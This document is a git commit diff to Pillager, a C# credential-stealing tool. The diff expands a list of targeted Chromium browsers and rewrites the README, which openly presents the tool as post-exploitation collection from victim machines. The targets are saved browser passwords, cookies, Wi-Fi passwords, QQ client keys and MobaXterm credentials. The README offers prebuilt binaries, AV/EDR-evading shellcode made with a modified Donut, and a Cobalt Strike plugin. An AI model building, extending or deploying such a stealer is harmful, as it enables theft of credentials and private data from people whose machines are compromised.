support more browser
This commit is contained in:
parent
cc29bd7a78
commit
c7fe6b7eeb
|
@ -1,4 +1,5 @@
|
||||||
using System;
|
using System;
|
||||||
|
using System.Collections.Generic;
|
||||||
using System.IO;
|
using System.IO;
|
||||||
using System.Security.Cryptography;
|
using System.Security.Cryptography;
|
||||||
using System.Text;
|
using System.Text;
|
||||||
|
@ -14,6 +15,30 @@ namespace Pillager.Browsers
|
||||||
|
|
||||||
public byte[] MasterKey { get; set; }
|
public byte[] MasterKey { get; set; }
|
||||||
|
|
||||||
|
public static Dictionary<string, string> browserOnChromium = new Dictionary<string, string>
|
||||||
|
{
|
||||||
|
{ "Chrome", "Google\\Chrome\\User Data" } ,
|
||||||
|
{ "Chrome Beta", "Google\\Chrome Beta\\User Data" } ,
|
||||||
|
{ "Chromium", "Chromium\\User Data" } ,
|
||||||
|
{ "Chrome SxS", "Google\\Chrome SxS\\User Data" },
|
||||||
|
{ "Edge", "Microsoft\\Edge\\User Data" } ,
|
||||||
|
{ "Brave-Browser", "BraveSoftware\\Brave-Browser\\User Data" } ,
|
||||||
|
{ "QQBrowser", "Tencent\\QQBrowser\\User Data" } ,
|
||||||
|
{ "SogouExplorer", "Sogou\\SogouExplorer\\User Data" } ,
|
||||||
|
{ "Vivaldi", "Vivaldi\\User Data" } ,
|
||||||
|
{ "CocCoc", "CocCoc\\Browser\\User Data" },
|
||||||
|
{ "Torch", "Torch\\User Data" },
|
||||||
|
{ "Kometa", "Kometa\\User Data" },
|
||||||
|
{ "Orbitum", "Orbitum\\User Data" },
|
||||||
|
{ "CentBrowser", "CentBrowser\\User Data" },
|
||||||
|
{ "7Star", "7Star\\7Star\\User Data" },
|
||||||
|
{ "Sputnik", "Sputnik\\Sputnik\\User Data" },
|
||||||
|
{ "Epic Privacy Browser", "Epic Privacy Browser\\User Data" },
|
||||||
|
{ "Uran", "uCozMedia\\Uran\\User Data" },
|
||||||
|
{ "Yandex", "Yandex\\YandexBrowser\\User Data" },
|
||||||
|
{ "Iridium", "Iridium\\User Data" },
|
||||||
|
};
|
||||||
|
|
||||||
private string[] profiles = {
|
private string[] profiles = {
|
||||||
"Default",
|
"Default",
|
||||||
"Profile 1",
|
"Profile 1",
|
||||||
|
|
|
@ -30,25 +30,12 @@ namespace Pillager
|
||||||
//Browsers
|
//Browsers
|
||||||
IE.Save(savepath);
|
IE.Save(savepath);
|
||||||
OldSogou.Save(savepath);//SogouExplorer < 12.x
|
OldSogou.Save(savepath);//SogouExplorer < 12.x
|
||||||
FireFox.Save(savepath);
|
FireFox.Save(savepath);
|
||||||
List<List<string>> browserOnChromium = new List<List<string>>()
|
foreach (var browser in Chrome.browserOnChromium)
|
||||||
{
|
|
||||||
new List<string>() { "Chrome", "Google\\Chrome\\User Data" } ,
|
|
||||||
new List<string>() { "Chrome Beta", "Google\\Chrome Beta\\User Data" } ,
|
|
||||||
new List<string>() { "Chromium", "Chromium\\User Data" } ,
|
|
||||||
new List<string>() { "Edge", "Microsoft\\Edge\\User Data" } ,
|
|
||||||
new List<string>() { "Brave-Browser", "BraveSoftware\\Brave-Browser\\User Data" } ,
|
|
||||||
new List<string>() { "QQBrowser", "Tencent\\QQBrowser\\User Data" } ,
|
|
||||||
new List<string>() { "SogouExplorer", "Sogou\\SogouExplorer\\User Data" } ,
|
|
||||||
new List<string>() { "Vivaldi", "Vivaldi\\User Data" } ,
|
|
||||||
new List<string>() { "CocCoc", "CocCoc\\Browser\\User Data" }
|
|
||||||
//new List<string>() { "", "" } ,
|
|
||||||
};
|
|
||||||
foreach (List<string> browser in browserOnChromium)
|
|
||||||
{
|
{
|
||||||
string chromepath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),
|
string chromepath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),
|
||||||
browser[1]);
|
browser.Value);
|
||||||
Chrome chrome = new Chrome(browser[0], chromepath);
|
Chrome chrome = new Chrome(browser.Key, chromepath);
|
||||||
chrome.Save(savepath);
|
chrome.Save(savepath);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
55
README.md
55
README.md
|
@ -4,11 +4,9 @@
|
||||||
|
|
||||||
## 介绍
|
## 介绍
|
||||||
|
|
||||||
这是一个敏感信息提取工具,将会长期维护,如果有任何问题或建议,欢迎发issues
|
Pillager是一个适用于后渗透期间的信息收集工具,可以收集目标机器上敏感信息,方便下一步渗透工作的进行。
|
||||||
|
|
||||||
在整理工具的过程中,发现目前的信息提取工具,普遍存在各种问题,最常见的如体积过大,缺少维护,于是自己在现有工具的基础上进行整理,得到了这款工具
|
## 支持
|
||||||
|
|
||||||
目前支持:
|
|
||||||
|
|
||||||
| Browser | BookMarks | Cookies | Passwords | Historys | Local Storage | Extension Settings |
|
| Browser | BookMarks | Cookies | Passwords | Historys | Local Storage | Extension Settings |
|
||||||
| :------------ | :-------: | :-----: | :-------: | :------: | :-----------: | :----------------: |
|
| :------------ | :-------: | :-----: | :-------: | :------: | :-----------: | :----------------: |
|
||||||
|
@ -16,14 +14,26 @@
|
||||||
| Edge | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
| Edge | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
||||||
| Chrome | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
| Chrome | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
||||||
| Chrome Beta | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
| Chrome Beta | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
||||||
|
| Chrome SxS | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
||||||
| Chromium | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
| Chromium | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
||||||
| Brave-Browser | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
| Brave-Browser | ✅ | ✅ | ✅ | ✅ | 🚧 | 🚧 |
|
||||||
| QQBrowser | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
| QQBrowser | ✅ | ✅ | ✅ | ✅ | 🚧 | 🚧 |
|
||||||
| SogouExplorer | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
| SogouExplorer | ✅ | ✅ | ✅ | ✅ | 🚧 | 🚧 |
|
||||||
| Vivaldi | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
| Vivaldi | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
|
||||||
| CocCoc | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
| CocCoc | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
|
||||||
|
| Torch | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
|
||||||
|
| Kometa | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
|
||||||
|
| Orbitum | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
|
||||||
|
| CentBrowser | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
|
||||||
|
| 7Star | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
|
||||||
|
| Sputnik | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
|
||||||
|
| Epic Privacy | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
|
||||||
|
| Uran | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
|
||||||
|
| Yandex | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
|
||||||
| FireFox | ✅ | ✅ | ✅ | ✅ | ❌ | ❌ |
|
| FireFox | ✅ | ✅ | ✅ | ✅ | ❌ | ❌ |
|
||||||
|
|
||||||
|
注:✅表示经过测试,🚧表示理论上支持但未经测试,❌表示无此功能或不支持
|
||||||
|
|
||||||
| IM | Support |
|
| IM | Support |
|
||||||
| -------- | ------------------ |
|
| -------- | ------------------ |
|
||||||
| QQ | ClientKey(Email) |
|
| QQ | ClientKey(Email) |
|
||||||
|
@ -34,14 +44,27 @@
|
||||||
| --------- | ------------------- |
|
| --------- | ------------------- |
|
||||||
| MobaXterm | Password/Credential |
|
| MobaXterm | Password/Credential |
|
||||||
|
|
||||||
|
| Others | Support |
|
||||||
|
| ------ | -------- |
|
||||||
|
| Wifi | Password |
|
||||||
|
|
||||||
后续将会陆续添加支持的软件
|
后续将会陆续添加支持的软件
|
||||||
|
|
||||||
|
## 使用方法
|
||||||
|
|
||||||
|
此项目使用Github Action自动编译打包,并上传至[Release](https://github.com/qwqdanchun/Pillager/releases),其中
|
||||||
|
|
||||||
|
* [Pillager.exe](https://github.com/qwqdanchun/Pillager/releases/download/AutoBuild/Pillager.exe) 为.Net Framework v3.5编译生成的exe
|
||||||
|
* [Pillager.bin](https://github.com/qwqdanchun/Pillager/releases/download/AutoBuild/Pillager.bin) Donut打包的raw格式的shellcode
|
||||||
|
* [cs-plugin.zip](https://github.com/qwqdanchun/Pillager/releases/download/AutoBuild/cs-plugin.zip) 为适用于CobaltStrike使用的插件
|
||||||
|
|
||||||
|
使用CobaltStrike可以直接下载插件包,其他人推荐将shellcode集成至自己的加载器或工具中运行,不建议直接使用Pillager.exe
|
||||||
|
|
||||||
|
执行后会将文件打包至 `%Temp%\Pillager.zip`,需要自行前往目录下载文件或修改代码将文件上传至他处
|
||||||
|
|
||||||
## 优点
|
## 优点
|
||||||
|
|
||||||
体积小,长期维护,shellcode兼容.Net Framework 2.x/3.x/4.x , shellcode兼容x86/x64,执行后文件输出至 `%Temp%\Pillager.zip`
|
* 体积在100kb左右,为同类工具体积的几分之一甚至几十分之一
|
||||||
|
* 支持大部分常见浏览器,常见聊天软件的信息提取,将陆续添加其他常用工具的信息收集
|
||||||
## 编译
|
* 长期维护,有问题可以及时的反馈处理
|
||||||
|
* 使用魔改版本的Donut,缩小shellcode体积,使shellcode兼容.Net Framework v3.5/v4.x,并去除AV/EDR对Donut提取的特征
|
||||||
Release有Github Action自动编译的exe及shellcode,可以直接使用
|
|
||||||
|
|
||||||
为了方便使用,Release附带了cs插件版本,使用Pillager命令即可执行
|
|
||||||
|
|
Loading…
Reference in New Issue